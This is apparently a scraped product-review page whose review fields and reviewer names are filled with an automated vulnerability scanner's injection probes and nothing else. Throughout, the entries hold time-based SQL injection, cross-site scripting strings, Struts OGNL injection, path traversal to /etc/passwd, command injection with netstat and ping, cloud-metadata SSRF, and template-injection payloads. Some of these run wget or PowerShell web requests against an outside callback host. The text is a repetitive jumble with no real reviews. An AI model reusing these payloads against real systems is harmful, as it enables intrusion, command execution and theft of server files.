1′ + (SELECT 0 FROM (SELECT SLEEP(29))qsqli_2222) + ‘
Rated 1 out of 5
John –
1
Rated 1 out of 5
John –
1;SELECT sleep(29); —
Rated 1 out of 5
John(SELECT 0 FROM (SELECT SLEEP(29))qsqli_3333) /*’XOR (SELECT 0 FROM (SELECT SLEEP(29))qsqli_3333); — OR’|”XOR (SELECT 0 FROM (SELECT SLEEP(29))qsqli_3333); — OR”*/ –
1
Rated 1 out of 5
John –
1′ WHERE 1337=1337 AND (SELECT 1319 FROM (SELECT(SLEEP(29)))qualys)– prime
Rated 1 out of 5
John –
1′ OR (SELECT 1337 FROM (SELECT(SLEEP(29)))prime) AND ‘qualys’=’qualys
Rated 1 out of 5
John –
1(#context[“xwork.MethodAccessor.denyMethodExecution”]= new java.lang.Boolean(false), #_memberAccess[“allowStaticMethodAccess”]= new java.lang.Boolean(true), @java.lang.Thread@sleep(28*1000))
Rated 1 out of 5
John –
_q=random(X2943918508Y2_2Z)
Rated 1 out of 5
John –
‘ onEvent=X2943918508Y2_2Z
Rated 1 out of 5
John –
” onEvent=X2943918508Y2_2Z
Rated 1 out of 5
John –
javascript:qxss(X2943918508Y2_2Z);
Rated 1 out of 5
John –
“>
Rated 1 out of 5
John”‘> –
1
Rated 1 out of 5
z–> –
1
Rated 1 out of 5
_q=random(X2943918508Y3_2Z) –
1
Rated 1 out of 5
John –
1 _q_q=random(5603SM9u)
Rated 1 out of 5
John –
” SRC=//localhost/jql46vYnA>
Rated 1 out of 5
John –
“‘><qssaptd9FaE=7;//<
Rated 1 out of 5
John”> –
1
Rated 1 out of 5
John –
BODY{background:url(“javascript:qssBF1g9V0j=7”)}
Rated 1 out of 5
‘ onEvent=X2943918508Y3_2Z –
1
Rated 1 out of 5
” onEvent=X2943918508Y3_2Z –
1
Rated 1 out of 5
John –
qssLJ319bxc=7
Rated 1 out of 5
script z_q(y)/script –
1
Rated 1 out of 5
qss{{q=(2*2.0)}}qss –
1
Rated 1 out of 5
{{333*334}} –
1
Rated 1 out of 5
q Content-Type:text/html Content-Length: 190 HTTP/1.1 200 OK Content-Type: text/html Set-Cookie: a=q Content-Length: 2 AA –
John + (SELECT 0 FROM (SELECT SLEEP(29))qsqli_1111) –
1
Rated 1 out of 5
John’ + (SELECT 0 FROM (SELECT SLEEP(29))qsqli_2222) + ‘ –
1
Rated 1 out of 5
John;SELECT sleep(29); — –
1
Rated 1 out of 5
John –
1(SELECT 0 FROM (SELECT SLEEP(29))qsqli_3333) /*’XOR (SELECT 0 FROM (SELECT SLEEP(29))qsqli_3333); — OR’|”XOR (SELECT 0 FROM (SELECT SLEEP(29))qsqli_3333); — OR”*/
Rated 1 out of 5
John’ WHERE 1337=1337 AND (SELECT 1319 FROM (SELECT(SLEEP(29)))qualys)– prime –
1
Rated 1 out of 5
John –
1
Rated 1 out of 5
John’ OR (SELECT 1337 FROM (SELECT(SLEEP(29)))prime) AND ‘qualys’=’qualys –
1
Rated 1 out of 5
John(#context[“xwork.MethodAccessor.denyMethodExecution”]= new java.lang.Boolean(false), #_memberAccess[“allowStaticMethodAccess”]= new java.lang.Boolean(true), @java.lang.Thread@sleep(28*1000)) –
John –
1
John –
“‘>
John –
_q=random(X157828996Y2_2Z)
John –
‘ onEvent=X157828996Y2_2Z
” onEvent=X157828996Y3_2Z –
1
John –
javascript:qxss(X157828996Y2_2Z);
“> –
1
John –
1″‘>
John –
z–>
“‘> –
1
_q=random(X157828996Y3_2Z) –
1
John –
1 _q_q=random(8x7D7ocb)
John –
John –
” SRC=//localhost/jBGNoeZb5>
Anonymous –
1
John –
“‘><qssDe532Dtt=7;//<
John –
1″>
John –
1
BODY{background:url(“javascript:qssE2wH34F0=7”)} –
1
‘ onEvent=X157828996Y3_2Z –
1
John –
” onEvent=X157828996Y2_2Z
John –
qss73Mn777e=7
John –
%3cscript z%3e_q(y)%3c/script%3e
John –
<script src=http://localhost/j
John –
qss{{q=(2*2.0)}}qss
John –
{{333*334}}
John –
q
Content-Type:text/html
Content-Length: 190
HTTP/1.1 200 OK
Content-Type: text/html
Set-Cookie: a=q
Content-Length: 2
AA
John –
q
Qualys_resp_hdr_injection: Vulnerable
q Qualys_resp_hdr_injection: Vulnerable –
1
John –
1′
John –
;–
# –
1
John –
/*
John –
“
John –
,
John –
(
1e309 –
1
/../../../../../../../etc/passwd –
1
John –
/../../../../../../../etc/passwd
John –
../../../../../../../etc/passwd
John –
//..//..//..//..//..//..//..//etc/passwd
//….//….//….//….//….//….//….//etc/passwd –
1
John –
//….//….//….//….//….//….//….//etc/passwd
John –
../../../../../../../Windows/System32/drivers/etc/hosts
../../../../../../../Windows/System32/drivers/etc/hosts –
1
php://filter/read=string.rot13/resource=/etc/passwd –
1
….//….//….//….//….//….//etc/passwd –
1
John –
a(){}phpinfo(); function a
|netstat -an –
1
John –
|netstat -an
John –
http://rfitest/
javascript:qxss(X157828996Y3_2Z); –
1
John –
“;(function(){qxssKx7KAB2w});/**/”
John –
“);(function(){qxssC689Qab8});/**/”
qualys(aqxssp61Lf9G9)xyz –
1
John –
‘;(function(){qxsseR8gT0iS});/**/’
John –
9;(function(){qxssA3UkiSVk});//
John –
9
;(function(){qxsstZ26gsGv});//
*/;(function(){qxssE9te0hi0});/* –
1
John –
‘-qxss6WCAhBRS()-‘
John –
“-qxssr5eWa3ek()-“
John –
|aaaa
=(23.0231*213.759)
|${23.0231*213.759}{23.0231*213.759}{{23.0231*213.759}}(23.0231*213.7591)=(23.0231*213.759)#{23.0231*213.759}
John –
{23.0231*213.759}${23.0231*213.759}{{=23.0231*213.759}}
;echo 23.0231*213.759;//{@math key=4335.158242899999 method=”add” operand=586.23659/} /* #set($value=23.0231*213.759) $value */ –
1
(23.0231*213.759) –
1
John –
function(){qxssCB4iSvHZ};
John –
http://169.254.169.254/latest/meta-data/
John –
https://community.qualys.com/
John –
QualysWAS${“150898”.toString().replace(“8”, “7”)}QualysWAS
John –
QualysWAS${150797*150797}QualysWAS
Joe+ bcc:was_engine@9810ef31c1048216643edef3a16b27f0f2e47fc4.20713022819318563.3790655326.smtphi01.smtp.us3.qualysperiscope.com. –
1
John –
http://22a239bc042da291867f724437bf632935048039.20713022819318563.1864421188.ssrf01.ssrf.us3.qualysperiscope.com.
John –
b3b3391acb4d3dc072a2683315ae09ab5a0d6ed5.20713022819318563.3204195125.ssrf02.ssrf.us3.qualysperiscope.com.
John –
${dns:address|937ac7f065a78933ce9fb40ec67ae823d2159c96.20713022819318563.4103852191.oscomm04.oscomm.us3.qualysperiscope.com.}
John –
$%7Bdns:address%7C@CIPHER@.@UNIQUEID@.@URI@.oscomm05.oscomm.@DOMAIN@%7D
John –
1
John –
${url:UTF-8:http://63529bb98f34a072db156b6b1eeac36c2979985b.20713022819318563.1831403709.oscomm06.oscomm.us3.qualysperiscope.com.}
John –
${url:UTF-8:https://21b728e95abf963c47b8c45e0afd97a9153b5e8d.20713022819318563.429676968.oscomm07.oscomm.us3.qualysperiscope.com.}
John –
${url:UTF-8:http://@CIPHER@.@UNIQUEID@.@URI@.oscomm08.oscomm.@DOMAIN@}
John –
${url:UTF-8:https://@CIPHER@.@UNIQUEID@.@URI@.oscomm09.oscomm.@DOMAIN@}
John –
powershell -c iwr -uri http://@CIPHER@.@UNIQUEID@.@URI@.oscomm11.oscomm.@DOMAIN@
John –
powershell -c iwr -uri https://@CIPHER@.@UNIQUEID@.@URI@.oscomm13.oscomm.@DOMAIN@
John –
${url:UTF-8::https://a081a2b4f00712bf7ea52d0885aba49dd282e024.20713022819318563.620874772.oscomm16.oscomm.us3.qualysperiscope.com./Qualyswas}
John –
${url:UTF-8::https://357b78d0035eee9ea7df8c878cd0253353b7ef4d.20713022819318563.1288382988.oscomm17.oscomm.us3.qualysperiscope.com./}
John –
${url:UTF-8:http://a7df5675b1015b7b3673ded08173b1bac3f4d4aa.20713022819318563.3545437432.oscomm18.oscomm.us3.qualysperiscope.com./}
John –
${url:UTF-8:https://7a0b7724f4a20cbc965ef481f1f8e2693b3f21c3.20713022819318563.4013360256.oscomm19.oscomm.us3.qualysperiscope.com./}
John –
${dns:address|b5ff7a4bdf67dae4ab9c54f1194952a34f80ffce.20713022819318563.3992815236.oscomm21.oscomm.us3.qualysperiscope.com.}
${url:UTF-8:http://dbffbad5c1c376027d9a0bf0ba8f29bd78d326a4.20713022819318563.2846908885.oscomm22.oscomm.us3.qualysperiscope.com.} –
1
John –
${url:UTF-8:https://b9f7dcd1883d22515c043d304a959225706d01c1.20713022819318563.2027899202.oscomm23.oscomm.us3.qualysperiscope.com.}
${url:UTF-8::http://08bf57da9521d3c1f24c881d382e3a4148120b2d.20713022819318563.553959226.oscomm24.oscomm.us3.qualysperiscope.com.} –
1
John –
${url:UTF-8::https://fd725d6d902fbd9d04a991bed64ccde57f80325f.20713022819318563.3755570064.oscomm25.oscomm.us3.qualysperiscope.com./}
{{ self._TemplateReference__context.cycler.__init__.__globals__.os.popen(‘wget http://d6da0239fb00b22b317fb3044924dbfb76a5f9a4.20713022819318563.1803230413.oscomm15019101.oscomm.us3.qualysperiscope.com.’).read() }} –
1
John –
${“”.getClass().forName(“java.net.InetAddress”).getMethod(“getByName”,””.getClass()).invoke(“”,”68410962483cff849fd8c5ca1aafb8add7e41891.20713022819318563.2179279839.oscomm15079701.oscomm.us3.qualysperiscope.com.”)}
http://localhost:19096 –
1
John –
file:///etc/passwd
John’) or 2634=2634 — –
1
John –
1
John –
1′ or 3789=3789 —
John –
1 or 4325=4325 —
John –
1
John or NULL IS NULL –
1
John –
1 and NULL IS NULL
John –
1′) or ‘swqtp’=’swqtp
John –
1′ or ‘tpklq’=’tpklq
John –
11 or 11=11
John –
1
John –
aaaa&ping -n 92 localhost&
John –
ping -c2 -i91 localhost
John –
|ping -c2 -i56 localhost
John –
|ping -c2 -i91 localhost|
John –
1WAITFOR DELAY ’00:00:29′
John –
1
John;WAITFOR DELAY ’00:00:29′; –
1
John –
1);WAITFOR DELAY ’00:00:29′–
John’;WAITFOR DELAY ’00:00:29′– –
1
John –
1′);WAITFOR DELAY ’00:00:29′–
John –
1′,0,0);WAITFOR DELAY’00:00:29′–
John –
1
John –
1 + (SELECT 0 FROM (SELECT SLEEP(29))qsqli_1111)
John –
1′ + (SELECT 0 FROM (SELECT SLEEP(29))qsqli_2222) + ‘
John –
1
John –
1;SELECT sleep(29); —
John(SELECT 0 FROM (SELECT SLEEP(29))qsqli_3333) /*’XOR (SELECT 0 FROM (SELECT SLEEP(29))qsqli_3333); — OR’|”XOR (SELECT 0 FROM (SELECT SLEEP(29))qsqli_3333); — OR”*/ –
1
John –
1′ WHERE 1337=1337 AND (SELECT 1319 FROM (SELECT(SLEEP(29)))qualys)– prime
John –
1′ OR (SELECT 1337 FROM (SELECT(SLEEP(29)))prime) AND ‘qualys’=’qualys
John –
1(#context[“xwork.MethodAccessor.denyMethodExecution”]= new java.lang.Boolean(false), #_memberAccess[“allowStaticMethodAccess”]= new java.lang.Boolean(true), @java.lang.Thread@sleep(28*1000))
John –
_q=random(X2943918508Y2_2Z)
John –
‘ onEvent=X2943918508Y2_2Z
John –
” onEvent=X2943918508Y2_2Z
John –
javascript:qxss(X2943918508Y2_2Z);
John –
“>
John”‘> –
1
z–> –
1
_q=random(X2943918508Y3_2Z) –
1
John –
1 _q_q=random(5603SM9u)
John –
” SRC=//localhost/jql46vYnA>
John –
“‘><qssaptd9FaE=7;//<
John”> –
1
John –
BODY{background:url(“javascript:qssBF1g9V0j=7”)}
‘ onEvent=X2943918508Y3_2Z –
1
” onEvent=X2943918508Y3_2Z –
1
John –
qssLJ319bxc=7
script z_q(y)/script –
1
qss{{q=(2*2.0)}}qss –
1
{{333*334}} –
1
q Content-Type:text/html Content-Length: 190 HTTP/1.1 200 OK Content-Type: text/html Set-Cookie: a=q Content-Length: 2 AA –
1
John –
q
Qualys_resp_hdr_injection: Vulnerable
John’ –
1
;– –
1
John –
#
/* –
1
“ –
1
, –
1
( –
1
John –
1e309
../../../../../../../etc/passwd –
1
//..//..//..//..//..//..//..//etc/passwd –
1
John –
php://filter/read=string.rot13/resource=/etc/passwd
John –
….//….//….//….//….//….//etc/passwd
a(){}phpinfo(); function a –
1
http://rfitest/ –
1
javascript:qxss(X2943918508Y3_2Z); –
1
John –
“;(function(){qxss3qX2O044});/**/”
John –
“);(function(){qxssR1yndImk});/**/”
John –
qualys(aqxss92965Be7)xyz
John –
‘;(function(){qxss3f1ZtEK9});/**/’
John –
9;(function(){qxssyJbOdBo0});//
John –
9
;(function(){qxssjL6QYtjy});//
John –
*/;(function(){qxss8n5u172e});/*
John –
‘-qxssC9l2w831()-‘
John –
“-qxss8347Ve3z()-“
|aaaa =(23.0231*213.759) |${23.0231*213.759}{23.0231*213.759}{{23.0231*213.759}}(23.0231*213.7591)=(23.0231*213.759)#{23.0231*213.759} –
1
{23.0231*213.759}${23.0231*213.759}{{=23.0231*213.759}} –
1
John –
;echo 23.0231*213.759;//{@math key=4335.158242899999 method=”add” operand=586.23659/}
/*
#set($value=23.0231*213.759)
$value
*/
John –
(23.0231*213.759)
function(){qxssSy58cziq}; –
1
http://169.254.169.254/latest/meta-data/ –
1
https://community.qualys.com/ –
1
QualysWAS${“150898”.toString().replace(“8”, “7”)}QualysWAS –
1
QualysWAS${150797*150797}QualysWAS –
1
John –
Joe+
bcc:was_engine@0fd60337d3ed6b5c71cd74d6883a4f169a8ffa08.20963360819318563.3054094343.smtphi01.smtp.us3.qualysperiscope.com.
John –
http://adc3e7408642651a5aebb486b593f696502af0c3.20963360819318563.762157663.ssrf01.ssrf.us3.qualysperiscope.com.
2fe81d9bd6719e65b77a3215ca5e09ccfb7854c7.20963360819318563.3966501216.ssrf02.ssrf.us3.qualysperiscope.com. –
1
John –
${dns:address|810cae56573c3f5d70b23921ac8b2d0090c3c9e2.20963360819318563.1793790745.oscomm04.oscomm.us3.qualysperiscope.com.}
$dns:address@CIPHER@.@UNIQUEID@.@URI@.oscomm05.oscomm.@DOMAIN@ –
1
${url:UTF-8:http://cc8bcf989c7565a558eadf627a23d79165c70dc1.20963360819318563.3177361947.oscomm06.oscomm.us3.qualysperiscope.com.} –
1
John –
${url:UTF-8:https://97a45f32ed71323a723584dac31558aadbd0dbd6.20963360819318563.3512855213.oscomm07.oscomm.us3.qualysperiscope.com.}
John –
1
John –
1
${url:UTF-8:https://@CIPHER@.@UNIQUEID@.@URI@.oscomm09.oscomm.@DOMAIN@} –
1
John –
1
John –
1
powershell -c iwr -uri https://@CIPHER@.@UNIQUEID@.@URI@.oscomm13.oscomm.@DOMAIN@ –
1
John –
${url:UTF-8::https://bb62d8713e80b9d596475fba3505d25e8e8e101d.20963360819318563.3431366401.oscomm16.oscomm.us3.qualysperiscope.com./Qualyswas}
John –
${url:UTF-8::https://389ec92387c1ad6ca8764d7341618d296b43cc31.20963360819318563.1010228688.oscomm17.oscomm.us3.qualysperiscope.com./}
John –
${url:UTF-8:http://cccbe004ee9f9814a3380461fc3b2d167e1f1489.20963360819318563.3574874110.oscomm18.oscomm.us3.qualysperiscope.com./}
John –
${url:UTF-8:https://32738d1344db52bbc60d7f1454a5dd54b0ff5f0e.20963360819318563.3401723592.oscomm19.oscomm.us3.qualysperiscope.com./}
John –
${dns:address|aa70a31bb0d33467298fbc5be855999fc19bf991.20963360819318563.3343483489.oscomm21.oscomm.us3.qualysperiscope.com.}
John –
${url:UTF-8:http://ec9a6e2f13dc9d4d97d5c3e25c25c16bf56b72f0.20963360819318563.3426431864.oscomm22.oscomm.us3.qualysperiscope.com.}
John –
${url:UTF-8:https://5de03b0a89295e8b812423831bc76c2c76a77cc4.20963360819318563.4251598356.oscomm23.oscomm.us3.qualysperiscope.com.}
John –
${url:UTF-8::http://f464b26725c8d7d10cb22961815b7f42b9e16302.20963360819318563.1236011307.oscomm24.oscomm.us3.qualysperiscope.com.}
John –
${url:UTF-8::https://9bd01aad79fef78a2dabd4c294b308af4930bfdf.20963360819318563.2449718842.oscomm25.oscomm.us3.qualysperiscope.com./}
John –
{{ self._TemplateReference__context.cycler.__init__.__globals__.os.popen(‘wget http://262840f309f3dddff36cf486442f66e84505405c.20963360819318563.4291885217.oscomm15019101.oscomm.us3.qualysperiscope.com.’).read() }}
John –
${“”.getClass().forName(“java.net.InetAddress”).getMethod(“getByName”,””.getClass()).invoke(“”,”72019593e19efcabe3143b3370f5dc8619746425.20963360819318563.3118431278.oscomm15079701.oscomm.us3.qualysperiscope.com.”)}
John –
http://localhost:19096
file:///etc/passwd –
1
John –
1′) or 2634=2634 —
John –
1
John’ or 3789=3789 — –
1
John –
1
John or 4325=4325 — –
1
John –
1
John –
1 or NULL IS NULL
John –
1
John and NULL IS NULL –
1
John –
1
John’) or ‘swqtp’=’swqtp –
1
John –
1
John’ or ‘tpklq’=’tpklq –
1
John –
1
John1 or 11=11 –
1
John –
1
aaaa&ping -n 92 localhost& –
1
ping -c2 -i91 localhost –
1
|ping -c2 -i56 localhost –
1
|ping -c2 -i91 localhost| –
1
JohnWAITFOR DELAY ’00:00:29′ –
1
John –
1;WAITFOR DELAY ’00:00:29′;
John);WAITFOR DELAY ’00:00:29′– –
1
John –
1′;WAITFOR DELAY ’00:00:29′–
John’);WAITFOR DELAY ’00:00:29′– –
1
John’,0,0);WAITFOR DELAY’00:00:29′– –
1
John + (SELECT 0 FROM (SELECT SLEEP(29))qsqli_1111) –
1
John’ + (SELECT 0 FROM (SELECT SLEEP(29))qsqli_2222) + ‘ –
1
John;SELECT sleep(29); — –
1
John –
1(SELECT 0 FROM (SELECT SLEEP(29))qsqli_3333) /*’XOR (SELECT 0 FROM (SELECT SLEEP(29))qsqli_3333); — OR’|”XOR (SELECT 0 FROM (SELECT SLEEP(29))qsqli_3333); — OR”*/
John’ WHERE 1337=1337 AND (SELECT 1319 FROM (SELECT(SLEEP(29)))qualys)– prime –
1
John –
1
John’ OR (SELECT 1337 FROM (SELECT(SLEEP(29)))prime) AND ‘qualys’=’qualys –
1
John(#context[“xwork.MethodAccessor.denyMethodExecution”]= new java.lang.Boolean(false), #_memberAccess[“allowStaticMethodAccess”]= new java.lang.Boolean(true), @java.lang.Thread@sleep(28*1000)) –
1